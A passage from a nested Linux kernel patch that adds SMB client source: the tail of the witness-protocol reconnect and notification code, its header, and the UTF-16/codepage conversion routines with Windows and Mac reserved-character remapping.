++	__be16 port = cpu_to_be16(CIFS_PORT);
++
++	if (old->ss_family == AF_INET) {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)old;
++
++		port = ipv4->sin_port;
++	} else if (old->ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)old;
++
++		port = ipv6->sin6_port;
++	}
++
++	if (new->ss_family == AF_INET) {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)new;
++
++		ipv4->sin_port = port;
++	} else if (new->ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)new;
++
++		ipv6->sin6_port = port;
++	}
++
++	*dst = *new;
++
++	return 0;
++}
++
++static int cifs_swn_reconnect(struct cifs_tcon *tcon, struct sockaddr_storage *addr)
++{
++	int ret = 0;
++
++	/* Store the reconnect address */
++	cifs_server_lock(tcon->ses->server);
++	if (cifs_sockaddr_equal(&tcon->ses->server->dstaddr, addr))
++		goto unlock;
++
++	ret = cifs_swn_store_swn_addr(addr, &tcon->ses->server->dstaddr,
++				      &tcon->ses->server->swn_dstaddr);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to store address: %d\n", __func__, ret);
++		goto unlock;
++	}
++	tcon->ses->server->use_swn_dstaddr = true;
++
++	/*
++	 * Unregister to stop receiving notifications for the old IP address.
++	 */
++	ret = cifs_swn_unregister(tcon);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
++			 __func__, ret);
++		goto unlock;
++	}
++
++	/*
++	 * And register to receive notifications for the new IP address now that we have
++	 * stored the new address.
++	 */
++	ret = cifs_swn_register(tcon);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to register for witness notifications: %d\n",
++			 __func__, ret);
++		goto unlock;
++	}
++
++	cifs_signal_cifsd_for_reconnect(tcon->ses->server, false);
++
++unlock:
++	cifs_server_unlock(tcon->ses->server);
++
++	return ret;
++}
++
++static int cifs_swn_client_move(struct cifs_swn_reg *swnreg, struct sockaddr_storage *addr)
++{
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)addr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)addr;
++
++	if (addr->ss_family == AF_INET)
++		cifs_dbg(FYI, "%s: move to %pI4\n", __func__, &ipv4->sin_addr);
++	else if (addr->ss_family == AF_INET6)
++		cifs_dbg(FYI, "%s: move to %pI6\n", __func__, &ipv6->sin6_addr);
++
++	return cifs_swn_reconnect(swnreg->tcon, addr);
++}
++
++int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info)
++{
++	struct cifs_swn_reg *swnreg;
++	char name[256];
++	int type;
++
++	if (info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]) {
++		int swnreg_id;
++
++		swnreg_id = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]);
++		mutex_lock(&cifs_swnreg_idr_mutex);
++		swnreg = idr_find(&cifs_swnreg_idr, swnreg_id);
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		if (swnreg == NULL) {
++			cifs_dbg(FYI, "%s: registration id %d not found\n", __func__, swnreg_id);
++			return -EINVAL;
++		}
++	} else {
++		cifs_dbg(FYI, "%s: missing registration id attribute\n", __func__);
++		return -EINVAL;
++	}
++
++	if (info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]) {
++		type = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]);
++	} else {
++		cifs_dbg(FYI, "%s: missing notification type attribute\n", __func__);
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case CIFS_SWN_NOTIFICATION_RESOURCE_CHANGE: {
++		int state;
++
++		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]) {
++			nla_strscpy(name, info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_NAME],
++					sizeof(name));
++		} else {
++			cifs_dbg(FYI, "%s: missing resource name attribute\n", __func__);
++			return -EINVAL;
++		}
++		if (info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]) {
++			state = nla_get_u32(info->attrs[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]);
++		} else {
++			cifs_dbg(FYI, "%s: missing resource state attribute\n", __func__);
++			return -EINVAL;
++		}
++		return cifs_swn_resource_state_changed(swnreg, name, state);
++	}
++	case CIFS_SWN_NOTIFICATION_CLIENT_MOVE: {
++		struct sockaddr_storage addr;
++
++		if (info->attrs[CIFS_GENL_ATTR_SWN_IP]) {
++			nla_memcpy(&addr, info->attrs[CIFS_GENL_ATTR_SWN_IP], sizeof(addr));
++		} else {
++			cifs_dbg(FYI, "%s: missing IP address attribute\n", __func__);
++			return -EINVAL;
++		}
++		return cifs_swn_client_move(swnreg, &addr);
++	}
++	default:
++		cifs_dbg(FYI, "%s: unknown notification type %d\n", __func__, type);
++		break;
++	}
++
++	return 0;
++}
++
++int cifs_swn_register(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++	int ret;
++
++	swnreg = cifs_get_swn_reg(tcon);
++	if (IS_ERR(swnreg))
++		return PTR_ERR(swnreg);
++
++	ret = cifs_swn_send_register_message(swnreg);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: Failed to send swn register message: %d\n", __func__, ret);
++		/* Do not put the swnreg or return error, the echo task will retry */
++	}
++
++	return 0;
++}
++
++int cifs_swn_unregister(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++
++	swnreg = cifs_find_swn_reg(tcon);
++	if (IS_ERR(swnreg)) {
++		mutex_unlock(&cifs_swnreg_idr_mutex);
++		return PTR_ERR(swnreg);
++	}
++
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++
++	cifs_put_swn_reg(swnreg);
++
++	return 0;
++}
++
++void cifs_swn_dump(struct seq_file *m)
++{
++	struct cifs_swn_reg *swnreg;
++	struct sockaddr_in *sa;
++	struct sockaddr_in6 *sa6;
++	int id;
++
++	seq_puts(m, "Witness registrations:");
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		seq_printf(m, "\nId: %u Refs: %u Network name: '%s'%s Share name: '%s'%s Ip address: ",
++				id, kref_read(&swnreg->ref_count),
++				swnreg->net_name, swnreg->net_name_notify ? "(y)" : "(n)",
++				swnreg->share_name, swnreg->share_name_notify ? "(y)" : "(n)");
++		switch (swnreg->tcon->ses->server->dstaddr.ss_family) {
++		case AF_INET:
++			sa = (struct sockaddr_in *) &swnreg->tcon->ses->server->dstaddr;
++			seq_printf(m, "%pI4", &sa->sin_addr.s_addr);
++			break;
++		case AF_INET6:
++			sa6 = (struct sockaddr_in6 *) &swnreg->tcon->ses->server->dstaddr;
++			seq_printf(m, "%pI6", &sa6->sin6_addr.s6_addr);
++			if (sa6->sin6_scope_id)
++				seq_printf(m, "%%%u", sa6->sin6_scope_id);
++			break;
++		default:
++			seq_puts(m, "(unknown)");
++		}
++		seq_printf(m, "%s", swnreg->ip_notify ? "(y)" : "(n)");
++	}
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++	seq_puts(m, "\n");
++}
++
++void cifs_swn_check(void)
++{
++	struct cifs_swn_reg *swnreg;
++	int id;
++	int ret;
++
++	mutex_lock(&cifs_swnreg_idr_mutex);
++	idr_for_each_entry(&cifs_swnreg_idr, swnreg, id) {
++		ret = cifs_swn_send_register_message(swnreg);
++		if (ret < 0)
++			cifs_dbg(FYI, "%s: Failed to send register message: %d\n", __func__, ret);
++	}
++	mutex_unlock(&cifs_swnreg_idr_mutex);
++}
+diff --git a/fs/smb/client/cifs_swn.h b/fs/smb/client/cifs_swn.h
+new file mode 100644
+index 0000000000000..8a9d2a5c9077e
+--- /dev/null
++++ b/fs/smb/client/cifs_swn.h
+@@ -0,0 +1,52 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Witness Service client for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#ifndef _CIFS_SWN_H
++#define _CIFS_SWN_H
++#include "cifsglob.h"
++
++struct cifs_tcon;
++struct sk_buff;
++struct genl_info;
++
++#ifdef CONFIG_CIFS_SWN_UPCALL
++extern int cifs_swn_register(struct cifs_tcon *tcon);
++
++extern int cifs_swn_unregister(struct cifs_tcon *tcon);
++
++extern int cifs_swn_notify(struct sk_buff *skb, struct genl_info *info);
++
++extern void cifs_swn_dump(struct seq_file *m);
++
++extern void cifs_swn_check(void);
++
++static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server)
++{
++	if (server->use_swn_dstaddr) {
++		server->dstaddr = server->swn_dstaddr;
++		return true;
++	}
++	return false;
++}
++
++static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server)
++{
++	server->use_swn_dstaddr = false;
++}
++
++#else
++
++static inline int cifs_swn_register(struct cifs_tcon *tcon) { return 0; }
++static inline int cifs_swn_unregister(struct cifs_tcon *tcon) { return 0; }
++static inline int cifs_swn_notify(struct sk_buff *s, struct genl_info *i) { return 0; }
++static inline void cifs_swn_dump(struct seq_file *m) {}
++static inline void cifs_swn_check(void) {}
++static inline bool cifs_swn_set_server_dstaddr(struct TCP_Server_Info *server) { return false; }
++static inline void cifs_swn_reset_server_dstaddr(struct TCP_Server_Info *server) {}
++
++#endif /* CONFIG_CIFS_SWN_UPCALL */
++#endif /* _CIFS_SWN_H */
+diff --git a/fs/smb/client/cifs_unicode.c b/fs/smb/client/cifs_unicode.c
+new file mode 100644
+index 0000000000000..e7582dd791794
+--- /dev/null
++++ b/fs/smb/client/cifs_unicode.c
+@@ -0,0 +1,632 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifs_uniupr.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++
++int cifs_remap(struct cifs_sb_info *cifs_sb)
++{
++	int map_type;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		map_type = SFM_MAP_UNI_RSVD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		map_type = SFU_MAP_UNI_RSVD;
++	else
++		map_type = NO_MAP_UNI_RSVD;
++
++	return map_type;
++}
++
++/* Convert character using the SFU - "Services for Unix" remapping range */
++static bool
++convert_sfu_char(const __u16 src_char, char *target)
++{
++	/*
++	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
++	 *     build_path_from_dentry are modified, as they use slash as
++	 *     separator.
++	 */
++	switch (src_char) {
++	case UNI_COLON:
++		*target = ':';
++		break;
++	case UNI_ASTERISK:
++		*target = '*';
++		break;
++	case UNI_QUESTION:
++		*target = '?';
++		break;
++	case UNI_PIPE:
++		*target = '|';
++		break;
++	case UNI_GRTRTHAN:
++		*target = '>';
++		break;
++	case UNI_LESSTHAN:
++		*target = '<';
++		break;
++	default:
++		return false;
++	}
++	return true;
++}
++
++/* Convert character using the SFM - "Services for Mac" remapping range */
++static bool
++convert_sfm_char(const __u16 src_char, char *target)
++{
++	if (src_char >= 0xF001 && src_char <= 0xF01F) {
++		*target = src_char - 0xF000;
++		return true;
++	}
++	switch (src_char) {
++	case SFM_COLON:
++		*target = ':';
++		break;
++	case SFM_DOUBLEQUOTE:
++		*target = '"';
++		break;
++	case SFM_ASTERISK:
++		*target = '*';
++		break;
++	case SFM_QUESTION:
++		*target = '?';
++		break;
++	case SFM_PIPE:
++		*target = '|';
++		break;
++	case SFM_GRTRTHAN:
++		*target = '>';
++		break;
++	case SFM_LESSTHAN:
++		*target = '<';
++		break;
++	case SFM_SPACE:
++		*target = ' ';
++		break;
++	case SFM_PERIOD:
++		*target = '.';
++		break;
++	default:
++		return false;
++	}
++	return true;
++}
++
++
++/*
++ * cifs_mapchar - convert a host-endian char to proper char in codepage
++ * @target - where converted character should be copied
++ * @from - pointer to the 2-byte host-endian source character(s)
++ * @cp - codepage to which character should be converted
++ * @maptype - how should the 7 NTFS/SMB reserved characters be mapped to UCS2?
++ *
++ * This function handles the conversion of a single character. It is the
++ * responsibility of the caller to ensure that the target buffer is large
++ * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
++ */
++static int
++cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
++	     int maptype)
++{
++	int len = 1;
++	__u16 src_char;
++
++	src_char = *from;
++
++	if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target))
++		return len;
++	else if ((maptype == SFU_MAP_UNI_RSVD) &&
++		  convert_sfu_char(src_char, target))
++		return len;
++
++	/* if character not one of seven in special remap set */
++	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
++	if (len <= 0)
++		goto surrogate_pair;
++
++	return len;
++
++surrogate_pair:
++	/* convert SURROGATE_PAIR and IVS */
++	if (strcmp(cp->charset, "utf8"))
++		goto unknown;
++	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
++	if (len <= 0)
++		goto unknown;
++	return len;
++
++unknown:
++	*target = '?';
++	len = 1;
++	return len;
++}
++
++/*
++ * cifs_from_utf16 - convert utf16le string to local charset
++ * @to - destination buffer
++ * @from - source buffer
++ * @tolen - destination buffer size (in bytes)
++ * @fromlen - source buffer size (in bytes)
++ * @codepage - codepage to which characters should be converted
++ * @map_type - should characters be remapped according to the mapchars option?
++ *
++ * Convert a little-endian utf16le string (as sent by the server) to a string
++ * in the provided codepage. The tolen and fromlen parameters are to ensure
++ * that the code doesn't walk off the end of the buffer (which is always
++ * a danger if the alignment of the source buffer is off). The destination
++ * string is always properly null terminated and fits in the destination
++ * buffer. Returns the length of the destination string in bytes (including
++ * null terminator).
++ *
++ * Note that some Windows versions actually send multiword UTF-16 characters
++ * instead of straight UTF16-2. The Linux nls routines, however, aren't able
++ * to deal with those characters properly, so in the event that we get some
++ * of them, they won't be translated correctly.
++ */
++int
++cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++		const struct nls_table *codepage, int map_type)
++{
++	int i, charlen, safelen;
++	int outlen = 0;
++	int nullsize = nls_nullsize(codepage);
++	int fromwords = fromlen / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];		/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
++
++	/*
++	 * because the chars can be of varying widths, we need to take care
++	 * not to overflow the destination buffer when we get close to the
++	 * end of it. Until we get to this offset, we don't need to check
++	 * for overflow however.
++	 */
++	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
++
++	for (i = 0; i < fromwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		if (i + 1 < fromwords)
++			ftmp[1] = get_unaligned_le16(&from[i + 1]);
++		else
++			ftmp[1] = 0;
++		if (i + 2 < fromwords)
++			ftmp[2] = get_unaligned_le16(&from[i + 2]);
++		else
++			ftmp[2] = 0;
++
++		/*
++		 * check to see if converting this character might make the
++		 * conversion bleed into the null terminator
++		 */
++		if (outlen >= safelen) {
++			charlen = cifs_mapchar(tmp, ftmp, codepage, map_type);
++			if ((outlen + charlen) > (tolen - nullsize))
++				break;
++		}
++
++		/* put converted char into 'to' buffer */
++		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type);
++		outlen += charlen;
++
++		/*
++		 * charlen (= bytes of UTF-8 for 1 character):
++		 * 4-byte UTF-8 (surrogate pair) is charlen=4
++		 *   (4 bytes of UTF-16 code)
++		 * 7-8 byte UTF-8 (IVS) is charlen=3+4 or 4+4
++		 *   (2 UTF-8 sequences mapped from 2 UTF-16 pairs)
++		 */
++		if (charlen == 4)
++			i++;
++		else if (charlen >= 5)
++			/* 5-6bytes UTF-8 */
++			i += 2;
++	}
++
++	/* properly null-terminate string */
++	for (i = 0; i < nullsize; i++)
++		to[outlen++] = 0;
++
++	return outlen;
++}
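++
++/*
++ * Illustrative example of the overflow guard above (values assumed): with
++ * tolen == 8, a utf8 codepage (NLS_MAX_CHARSET_SIZE == 6) and a 1-byte null,
++ * safelen is 1, so every character after the first output byte is test
++ * converted into tmp before being committed to the destination.
++ */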
++
++/*
++ * cifs_strtoUTF16 - convert a character string to a UTF-16 (unicode) string
++ */
++int
++cifs_strtoUTF16(__le16 *to, const char *from, int len,
++	      const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to; /* needed to quiet sparse */
++
++	/* special case for utf8 to handle no plane0 chars */
++	if (!strcmp(codepage->charset, "utf8")) {
++		/*
++		 * Convert utf8 -> utf16. We assume there is enough space in
++		 * the destination, as the caller should have ensured that the
++		 * conversion cannot overflow; len is the length in wchar_t
++		 * (16-bit) units.
++		 */
++		i  = utf8s_to_utf16s(from, len, UTF16_LITTLE_ENDIAN,
++				       (wchar_t *) to, len);
++
++		/* on success, terminate and exit */
++		if (i >= 0)
++			goto success;
++		/*
++		 * If it fails, fall back to UCS encoding, as this function
++		 * should not return negative values. Currently it can fail
++		 * only if the source contains invalidly encoded characters.
++		 */
++	}
++
++	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		if (charlen < 1) {
++			cifs_dbg(VFS, "strtoUTF16: char2uni of 0x%x returned %d\n",
++				 *from, charlen);
++			/* A question mark */
++			wchar_to = 0x003f;
++			charlen = 1;
++		}
++		put_unaligned_le16(wchar_to, &to[i]);
++	}
++
++success:
++	put_unaligned_le16(0, &to[i]);
++	return i;
++}
++
++/*
++ * cifs_utf16_bytes - how long will a string be after conversion?
++ * @from - pointer to input string
++ * @maxbytes - don't go past this many bytes of input string
++ * @codepage - destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
++ */
++int
++cifs_utf16_bytes(const __le16 *from, int maxbytes,
++		const struct nls_table *codepage)
++{
++	int i;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		if (i + 1 < maxwords)
++			ftmp[1] = get_unaligned_le16(&from[i + 1]);
++		else
++			ftmp[1] = 0;
++		if (i + 2 < maxwords)
++			ftmp[2] = get_unaligned_le16(&from[i + 2]);
++		else
++			ftmp[2] = 0;
++
++		charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD);
++		outlen += charlen;
++	}
++
++	return outlen;
++}
++
++/*
++ * cifs_strndup_from_utf16 - copy a string from wire format to the local
++ * codepage
++ * @src - source string
++ * @maxlen - don't walk past this many bytes in the source string
++ * @is_unicode - is this a unicode string?
++ * @codepage - destination codepage
++ *
++ * Take a string given by the server, convert it to the local codepage and
++ * put it in a new buffer. Returns a pointer to the new string or NULL on
++ * error.
++ */
++char *
++cifs_strndup_from_utf16(const char *src, const int maxlen,
++			const bool is_unicode, const struct nls_table *codepage)
++{
++	int len;
++	char *dst;
++
++	if (is_unicode) {
++		len = cifs_utf16_bytes((__le16 *) src, maxlen, codepage);
++		len += nls_nullsize(codepage);
++		dst = kmalloc(len, GFP_KERNEL);
++		if (!dst)
++			return NULL;
++		cifs_from_utf16(dst, (__le16 *) src, len, maxlen, codepage,
++				NO_MAP_UNI_RSVD);
++	} else {
++		dst = kstrndup(src, maxlen, GFP_KERNEL);
++	}
++
++	return dst;
++}
++
++static __le16 convert_to_sfu_char(char src_char)
++{
++	__le16 dest_char;
++
++	switch (src_char) {
++	case ':':
++		dest_char = cpu_to_le16(UNI_COLON);
++		break;
++	case '*':
++		dest_char = cpu_to_le16(UNI_ASTERISK);
++		break;
++	case '?':
++		dest_char = cpu_to_le16(UNI_QUESTION);
++		break;
++	case '<':
++		dest_char = cpu_to_le16(UNI_LESSTHAN);
++		break;
++	case '>':
++		dest_char = cpu_to_le16(UNI_GRTRTHAN);
++		break;
++	case '|':
++		dest_char = cpu_to_le16(UNI_PIPE);
++		break;
++	default:
++		dest_char = 0;
++	}
++
++	return dest_char;
++}
++
++static __le16 convert_to_sfm_char(char src_char, bool end_of_string)
++{
++	__le16 dest_char;
++
++	if (src_char >= 0x01 && src_char <= 0x1F) {
++		dest_char = cpu_to_le16(src_char + 0xF000);
++		return dest_char;
++	}
++	switch (src_char) {
++	case ':':
++		dest_char = cpu_to_le16(SFM_COLON);
++		break;
++	case '"':
++		dest_char = cpu_to_le16(SFM_DOUBLEQUOTE);
++		break;
++	case '*':
++		dest_char = cpu_to_le16(SFM_ASTERISK);
++		break;
++	case '?':
++		dest_char = cpu_to_le16(SFM_QUESTION);
++		break;
++	case '<':
++		dest_char = cpu_to_le16(SFM_LESSTHAN);
++		break;
++	case '>':
++		dest_char = cpu_to_le16(SFM_GRTRTHAN);
++		break;
++	case '|':
++		dest_char = cpu_to_le16(SFM_PIPE);
++		break;
++	case '.':
++		if (end_of_string)
++			dest_char = cpu_to_le16(SFM_PERIOD);
++		else
++			dest_char = 0;
++		break;
++	case ' ':
++		if (end_of_string)
++			dest_char = cpu_to_le16(SFM_SPACE);
++		else
++			dest_char = 0;
++		break;
++	default:
++		dest_char = 0;
++	}
++
++	return dest_char;
++}
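++
++/*
++ * Illustrative example (editorial): with SFM mapping enabled, a trailing '.'
++ * or ' ' in a path component (e.g. creating "notes.") is remapped into the
++ * Unicode private-use area (SFM_PERIOD/SFM_SPACE) so servers which reject
++ * such names can still store them, and convert_sfm_char() maps it back on
++ * the way in.
++ */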
++
++/*
++ * Convert a 16-bit Unicode pathname to wire format from a string in the
++ * current code page. The conversion may involve remapping the six characters
++ * that are only legal in POSIX-like OSes (if they are present in the string).
++ * Path names are little-endian 16-bit Unicode on the wire.
++ */
++int
++cifsConvertToUTF16(__le16 *target, const char *source, int srclen,
++		 const struct nls_table *cp, int map_chars)
++{
++	int i, charlen;
++	int j = 0;
++	char src_char;
++	__le16 dst_char;
++	wchar_t tmp;
++	wchar_t *wchar_to;	/* UTF-16 */
++	int ret;
++	unicode_t u;
++
++	if (map_chars == NO_MAP_UNI_RSVD)
++		return cifs_strtoUTF16(target, source, PATH_MAX, cp);
++
++	wchar_to = kzalloc(6, GFP_KERNEL);
++
++	for (i = 0; i < srclen; j++) {
++		src_char = source[i];
++		charlen = 1;
++
++		/* check if end of string */
++		if (src_char == 0)
++			goto ctoUTF16_out;
++
++		/* see if we must remap this char */
++		if (map_chars == SFU_MAP_UNI_RSVD)
++			dst_char = convert_to_sfu_char(src_char);
++		else if (map_chars == SFM_MAP_UNI_RSVD) {
++			bool end_of_string;
++
++			/*
++			 * Remap spaces and periods found at the end of every
++			 * component of the path. The special cases of '.' and
++			 * '..' do not need to be dealt with explicitly because
++			 * they are addressed in namei.c:link_path_walk().
++			 */
++			if ((i == srclen - 1) || (source[i+1] == '\\'))
++				end_of_string = true;
++			else
++				end_of_string = false;
++
++			dst_char = convert_to_sfm_char(src_char, end_of_string);
++		} else
++			dst_char = 0;
++		/*
++		 * FIXME: We can not handle remapping backslash (UNI_SLASH)
++		 * until all the calls to build_path_from_dentry are modified,
++		 * as they use backslash as separator.
++		 */
++		if (dst_char == 0) {
++			charlen = cp->char2uni(source + i, srclen - i, &tmp);
++			dst_char = cpu_to_le16(tmp);
++
++			/*
++			 * if no match, use question mark, which at least in
++			 * some cases serves as wild card
++			 */
++			if (charlen > 0)
++				goto ctoUTF16;
++
++			/* convert SURROGATE_PAIR */
++			if (strcmp(cp->charset, "utf8") || !wchar_to)
++				goto unknown;
++			if (*(source + i) & 0x80) {
++				charlen = utf8_to_utf32(source + i, 6, &u);
++				if (charlen < 0)
++					goto unknown;
++			} else
++				goto unknown;
++			ret  = utf8s_to_utf16s(source + i, charlen,
++					       UTF16_LITTLE_ENDIAN,
++					       wchar_to, 6);
++			if (ret < 0)
++				goto unknown;
++
++			i += charlen;
++			dst_char = cpu_to_le16(*wchar_to);
++			if (charlen <= 3)
++				/* 1-3 bytes UTF-8 to 2 bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++			else if (charlen == 4) {
++				/* 4 bytes UTF-8 (surrogate pair) to 4 bytes
++				 * UTF-16; 7-8 bytes UTF-8 (IVS) divided into
++				 * two UTF-16 units (charlen=3+4 or 4+4) */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++			} else if (charlen >= 5) {
++				/* 5-6 bytes UTF-8 to 6 bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 2));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++			}
++			continue;
++
++unknown:
++			dst_char = cpu_to_le16(0x003f);
++			charlen = 1;
++		}
++
++ctoUTF16:
++		/*
++		 * character may take more than one byte in the source string,
++		 * but will take exactly two bytes in the target string
++		 */
++		i += charlen;
++		put_unaligned(dst_char, &target[j]);
++	}
++
++ctoUTF16_out:
++	put_unaligned(0, &target[j]); /* Null terminate target unicode string */
++	kfree(wchar_to);
++	return j;
++}
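++
++/*
++ * As a worked example, converting the 3-byte name "a:b" with
++ * SFM_MAP_UNI_RSVD produces the UTF-16LE sequence 0x0061, 0xF022, 0x0062
++ * followed by a null terminator, and the function returns 3.
++ */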
++
++/*
++ * cifs_local_to_utf16_bytes - how long will a string be after conversion?
++ * @from - pointer to input string
++ * @len - don't go past this many bytes of input string
++ * @codepage - source codepage
++ *
++ * Walk a string and return the number of bytes that the string will
++ * occupy after being converted from the given codepage to UTF-16, not
++ * including any null termination required. Don't walk past @len bytes
++ * in the source buffer.
++ */
++
++static int
++cifs_local_to_utf16_bytes(const char *from, int len,
++			  const struct nls_table *codepage)
++{
++	int charlen;
++	int i;
++	wchar_t wchar_to;
++
++	for (i = 0; len && *from; i++, from += charlen, len -= charlen) {
++		charlen = codepage->char2uni(from, len, &wchar_to);
++		/* Failed conversion defaults to a question mark */
++		if (charlen < 1)
++			charlen = 1;
++	}
++	return 2 * i; /* UTF16 characters are two bytes */
++}
++
++/*
++ * cifs_strndup_to_utf16 - copy a string to wire format from the local codepage
++ * @src - source string
++ * @maxlen - don't walk past this many bytes in the source string
++ * @utf16_len - the length of the allocated string in bytes (including null)
++ * @cp - source codepage
++ * @remap - map special chars
++ *
++ * Take a string, convert it from the local codepage to UTF16, and
++ * put it in a new buffer. Returns a pointer to the new string or NULL on
++ * error.
++ */
++__le16 *
++cifs_strndup_to_utf16(const char *src, const int maxlen, int *utf16_len,
++		      const struct nls_table *cp, int remap)
++{
++	int len;
++	__le16 *dst;
++
++	len = cifs_local_to_utf16_bytes(src, maxlen, cp);
++	len += 2; /* NULL */
++	dst = kmalloc(len, GFP_KERNEL);
++	if (!dst) {
++		*utf16_len = 0;
++		return NULL;
++	}
++	cifsConvertToUTF16(dst, src, strlen(src), cp, remap);
++	*utf16_len = len;
++	return dst;
++}
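++
++/*
++ * Typical use: cifs_strndup_to_utf16("file?", PATH_MAX, &len, cp,
++ * SFU_MAP_UNI_RSVD) allocates 2 * 5 + 2 == 12 bytes, stores 12 in len,
++ * and returns the UTF-16LE name with '?' remapped to 0xF03F.
++ */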
+diff --git a/fs/smb/client/cifs_unicode.h b/fs/smb/client/cifs_unicode.h
+new file mode 100644
+index 0000000000000..80b3d845419fa
+--- /dev/null
++++ b/fs/smb/client/cifs_unicode.h
+@@ -0,0 +1,404 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * cifs_unicode:  Unicode kernel case support
++ *
++ * Function:
++ *     Convert a unicode character to upper or lower case using
++ *     compressed tables.
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *
++ * Notes:
++ *     These APIs are based on the C library functions.  The semantics
++ *     should match the C functions but with expanded size operands.
++ *
++ *     The upper/lower functions are based on a table created by mkupr.
++ *     This is a compressed table of upper and lower case conversion.
++ */
++#ifndef _CIFS_UNICODE_H
++#define _CIFS_UNICODE_H
++
++#include <asm/byteorder.h>
++#include <linux/types.h>
++#include <linux/nls.h>
++
++#define  UNIUPR_NOLOWER		/* Example to not expand lower case tables */
++
++/*
++ * Windows maps these to the user defined 16 bit Unicode range since they are
++ * reserved symbols (along with \ and /), otherwise illegal to store
++ * in filenames in NTFS
++ */
++#define UNI_ASTERISK    (__u16) ('*' + 0xF000)
++#define UNI_QUESTION    (__u16) ('?' + 0xF000)
++#define UNI_COLON       (__u16) (':' + 0xF000)
++#define UNI_GRTRTHAN    (__u16) ('>' + 0xF000)
++#define UNI_LESSTHAN    (__u16) ('<' + 0xF000)
++#define UNI_PIPE        (__u16) ('|' + 0xF000)
++#define UNI_SLASH       (__u16) ('\\' + 0xF000)
++
++/*
++ * Macs use an older "SFM" mapping of the symbols above. Fortunately it does
++ * not conflict (although it almost does) with the mapping above.
++ */
++
++#define SFM_DOUBLEQUOTE ((__u16) 0xF020)
++#define SFM_ASTERISK    ((__u16) 0xF021)
++#define SFM_QUESTION    ((__u16) 0xF025)
++#define SFM_COLON       ((__u16) 0xF022)
++#define SFM_GRTRTHAN    ((__u16) 0xF024)
